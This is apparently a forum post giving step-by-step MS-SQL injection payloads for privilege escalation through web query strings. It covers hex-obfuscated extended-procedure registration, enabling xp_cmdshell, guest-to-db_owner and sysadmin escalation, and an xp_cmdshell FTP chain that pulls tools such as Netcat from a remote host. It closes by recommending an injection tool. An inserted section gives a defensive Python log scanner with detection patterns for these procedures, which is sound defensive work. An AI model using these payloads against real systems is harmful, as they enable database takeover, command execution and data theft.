MS-SQL Injection Privilege Escalation!

Hi God.

Hi again, my readers!
[Attention]: I break long commands across lines.
1- In MSSQL, when your privilege is USER or db_owner, you can enable xp_dirtree and list the directory of the drive you want.

viewdetail.aspx?test=22';exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00--

After enabling it, you can execute xp_dirtree, save the result in the database, and view it.

2- Enable execution with administrator privilege, without execute permission:

Enable xp_cmdshell (XP_EXC):

viewdetail.aspx?test=22';EXEC+sp_configure+
+'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

Enable Ole Automation Procedures (OS_EX):

viewdetail.aspx?test=22';exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

After enabling, execute:

viewdetail.aspx?test=22';EXEC xp_cmdshell 'ping 127.0.0.1';

3- Back up the database:

viewdetail.aspx?test=22"+BACKUP database master to disk='d:\Inetpub\wwwroot\1.zip';--

4- GUEST = DB_OWNER:

/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test'--

5- Add to "BUILTIN\ADMINISTRATORS":

FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx'
exec sp_executesql N'drop view dbo.test'--

and then:

FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --

Enable OPENROWSET/OLEDB:

FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

6- Open a remote link:

/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

7- Upload Netcat or …

/FullStory.asp?id=1;select * from openrowset('sqloledb','server=UNESCO;uid=BUILTIN\Administrators;pwd=','set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f" & del f')--

Code:

echo open a.b.c.d >f
echo user a a >>f
echo bin >>f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
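From the defender's side, every step above (1 through 7) leaves the same trace: a stacked query in the application's query string that names a system procedure the application itself never calls (sp_addextendedproc, sp_configure with xp_cmdshell or Ole Automation Procedures, xp_cmdshell, xp_dirtree, BACKUP ... TO DISK, sp_msdropretry, sp_addsrvrolemember, openrowset). The trick in step 1, passing the procedure name as a 0x... literal, hides the name from a plain string match because SQL Server converts the binary literal to nvarchar, so the bytes are UTF-16LE. The scanner below is an added example and is not code from the post; it URL-decodes each IIS W3C log entry, unhexes such literals back to text, and matches the result against a tactic list. The log lines, the tactic names and the pattern list are all constructed for this example (the field order comes from the log's own #Fields header, so it adapts to other IIS layouts).

```python
import re
from urllib.parse import unquote_plus

# Stacked-query / extended-procedure markers for each step of the post.
# The tactic names and the pattern list are assumptions made for this example;
# tune them to the procedures your own application is allowed to call.
PATTERNS = {
    "register_extended_proc": r"\bsp_addextendedproc\b",
    "enable_xp_cmdshell":     r"\bsp_configure\b[^;]*\bxp_cmdshell\b",
    "enable_ole_automation":  r"\bsp_configure\b[^;]*\bole automation procedures\b",
    "xp_cmdshell":            r"\bxp_cmdshell\b",
    "directory_listing":      r"\bxp_dirtree\b",
    "backup_to_disk":         r"\bbackup\s+database\b.*\bto\s+disk\b",
    "sysusers_tamper":        r"\bsp_msdropretry\b",
    "sysadmin_grant":         r"\bsp_addsrvrolemember\b",
    "ad_hoc_remote_query":    r"\bopenrowset\s*\(",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in PATTERNS.items()}

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")


def decode_hex_literal(match):
    """Replace a T-SQL 0x... literal with the text it encodes, if it is text.

    Step 1 of the post passes the procedure name as a binary literal instead of
    'xp_dirtree'; SQL Server implicitly converts it to nvarchar, so the bytes
    are UTF-16LE.  UTF-16LE ASCII text shows up as character bytes interleaved
    with zeros; plain ASCII literals are handled as well.  Literals that do not
    decode to printable text (for example sid=0x01) are left untouched.
    """
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    raw = bytes.fromhex(digits)
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        raw = raw[::2]
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return match.group(0)
    return text if text.isprintable() and text.strip() else match.group(0)


def normalize(query_string):
    """URL-decode ('+' included), unhex string literals, collapse whitespace."""
    text = unquote_plus(query_string)
    text = HEX_LITERAL.sub(decode_hex_literal, text)
    return re.sub(r"\s+", " ", text)


def parse_w3c(lines):
    """Yield one dict per entry of a W3C extended (IIS-style) log, driven by its #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def scan(lines):
    """Return one finding per request whose decoded query string matches a tactic."""
    findings = []
    for entry in parse_w3c(lines):
        query = entry.get("cs-uri-query", "-")
        if query == "-":
            continue
        decoded = normalize(query)
        hits = [name for name, rx in COMPILED.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "client": entry.get("c-ip"),
                "uri": entry.get("cs-uri-stem"),
                "tactics": hits,
                "decoded": decoded,
            })
    return findings


# Constructed sample log (not a real capture): one benign request followed by
# the step 1, step 2 and step 5 payloads from the post, as IIS would record them.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2009-03-01 10:14:58 10.0.0.5 GET /viewdetail.aspx test=22 80 - 198.51.100.7 Mozilla/4.0 200
2009-03-01 10:15:02 10.0.0.5 GET /viewdetail.aspx test=22';exec+master.dbo.sp_addextendedproc+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00-- 80 - 198.51.100.7 Mozilla/4.0 500
2009-03-01 10:15:09 10.0.0.5 GET /viewdetail.aspx test=22';EXEC+sp_configure+'show+advanced+options',1;RECONFIGURE;EXEC+sp_configure+'xp_cmdshell',1;RECONFIGURE;-- 80 - 198.51.100.7 Mozilla/4.0 500
2009-03-01 10:15:20 10.0.0.5 GET /FullStory.asp id=1;exec+master..sp_addsrvrolemember+'someuser',sysadmin-- 80 - 198.51.100.7 Mozilla/4.0 200
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["client"], f["uri"], ",".join(f["tactics"]))
        print("   ", f["decoded"])
```

Run against the sample, the benign request produces nothing, the step 1 line is reported as register_extended_proc plus directory_listing because the 0x literal decodes to xp_dirtree, and the step 2 line is reported as enable_xp_cmdshell. Matching on the decoded text rather than the raw query string is the point: the same request seen raw contains neither "xp_dirtree" nor any quote character, which is exactly why the hex form is used. The findings are also the natural place to pair this with the server-side fix the post implies by omission: an application login that is not db_owner or sysadmin, and xp_cmdshell and Ole Automation Procedures left disabled in sp_configure.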

Another way?!

You can use Pangolin; it is a good SQL injector that bypasses some protections:

Download:

http://www.nosec.org/

Enjoy.

Daphne.
